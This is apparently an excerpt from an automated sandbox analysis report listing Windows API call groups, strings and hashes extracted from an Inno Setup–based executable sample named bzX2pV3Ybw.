                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                    • API String ID: 190572456-3516654456
                                                                                                    • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                    • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                                    • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                    • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                                    APIs
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                                    • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                                    • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                                    • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$StretchText
                                                                                                    • String ID:
                                                                                                    • API String ID: 2984075790-0
                                                                                                    • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                    • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                                    • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                    • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseDirectoryHandleSystem
                                                                                                    • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                    • API String ID: 2051275411-1862435767
                                                                                                    • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                    • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                                    • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                    • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                                    APIs
                                                                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                                    • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                                    • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Text$Color$Draw$OffsetRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 1005981011-0
                                                                                                    • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                    • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                                    • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                    • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                                    APIs
                                                                                                    • GetFocus.USER32 ref: 0041B745
                                                                                                    • GetDC.USER32(?), ref: 0041B751
                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                                    • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                                    • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                    • String ID: %H
                                                                                                    • API String ID: 3275473261-1959103961
                                                                                                    • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                    • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                                    • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                    • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                                    APIs
                                                                                                    • GetFocus.USER32 ref: 0041BA17
                                                                                                    • GetDC.USER32(?), ref: 0041BA23
                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                                    • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                                    • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                    • String ID: %H
                                                                                                    • API String ID: 3275473261-1959103961
                                                                                                    • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                    • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                                    • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                    • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                                    APIs
                                                                                                      • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                      • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                                    • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                                    • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                                    Strings
                                                                                                    • Deleting Uninstall data files., xrefs: 004964FB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                    • String ID: Deleting Uninstall data files.
                                                                                                    • API String ID: 1570157960-2568741658
                                                                                                    • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                    • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                                    • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                    • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
• RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
• AddFontResourceA.GDI32(00000000), ref: 00470297
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
Strings
• Failed to open Fonts registry key., xrefs: 00470281
• Failed to set value in Fonts registry key., xrefs: 0047026C
• AddFontResource, xrefs: 004702B5
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: CloseFontMessageNotifyOpenResourceSendValue
• String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
• API String ID: 955540645-649663873
APIs
  • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
  • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
  • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
• GetVersion.KERNEL32 ref: 00462E60
• SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
• SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
• LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
• SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
• SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
• String ID: Explorer
• API String ID: 2594429197-512347832
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
• GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
• CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8), ref: 004783CC
• CloseHandle.KERNEL32(00000000,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: FileHandle$AddressAttributesCloseCreateModuleProc
• String ID: GetFinalPathNameByHandleA$kernel32.dll
• API String ID: 2704155762-2318956294
APIs
• GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
  • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
Strings
• Failed to delete directory (%d)., xrefs: 00459F68
• Deleting directory: %s, xrefs: 00459E5B
• Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
• Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
• Stripped read-only attribute., xrefs: 00459E94
• Failed to strip read-only attribute., xrefs: 00459EA0
• Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: CloseErrorFindLast
• String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
• API String ID: 754982922-1448842058
APIs
• GetCapture.USER32 ref: 00422EA4
• GetCapture.USER32 ref: 00422EB3
• SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
• ReleaseCapture.USER32 ref: 00422EBE
• GetActiveWindow.USER32 ref: 00422ECD
• SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
• SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
• GetActiveWindow.USER32 ref: 00422FBF
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: CaptureMessageSend$ActiveWindow$Release
• String ID:
• API String ID: 862346643-0
APIs
• GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
• GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
• GetActiveWindow.USER32 ref: 0042F2DA
• MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
• SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Window$ActiveLong$Message
• String ID:
• API String ID: 2785966331-0
APIs
• GetDC.USER32(00000000), ref: 0042948A
• GetTextMetricsA.GDI32(00000000), ref: 00429493
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(00000000,00000000), ref: 004294A2
• GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
• SelectObject.GDI32(00000000,00000000), ref: 004294B6
• ReleaseDC.USER32(00000000,00000000), ref: 004294BE
• GetSystemMetrics.USER32(00000006), ref: 004294E3
• GetSystemMetrics.USER32(00000006), ref: 004294FD
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
• String ID:
• API String ID: 1583807278-0
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0041DE27
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                                    • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                                    • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                                    • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                                    • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                                    • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: ObjectStock$CapsDeviceIconLoadRelease
• String ID:
• API String ID: 225703358-0
• Opcode ID: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
• Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
• Opcode Fuzzy Hash: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
• Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
APIs
• LoadCursorA.USER32(00000000,00007F02), ref: 00463344
• SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
• SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
Strings
Similarity
• API ID: Cursor$Load
• String ID: $ $Internal error: Item already expanding
• API String ID: 1675784387-1948079669
• Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
• Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
• Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
• Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
Strings
Similarity
• API ID: PrivateProfileStringWrite
• String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
• API String ID: 390214022-3304407042
• Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
• Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
• Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
• Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
APIs
• GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
• SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
• GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
Strings
Similarity
• API ID: ClassInfoLongMessageSendWindow
• String ID: COMBOBOX$Inno Setup: Language
• API String ID: 3391662889-4234151509
• Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
• Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
• Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
• Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
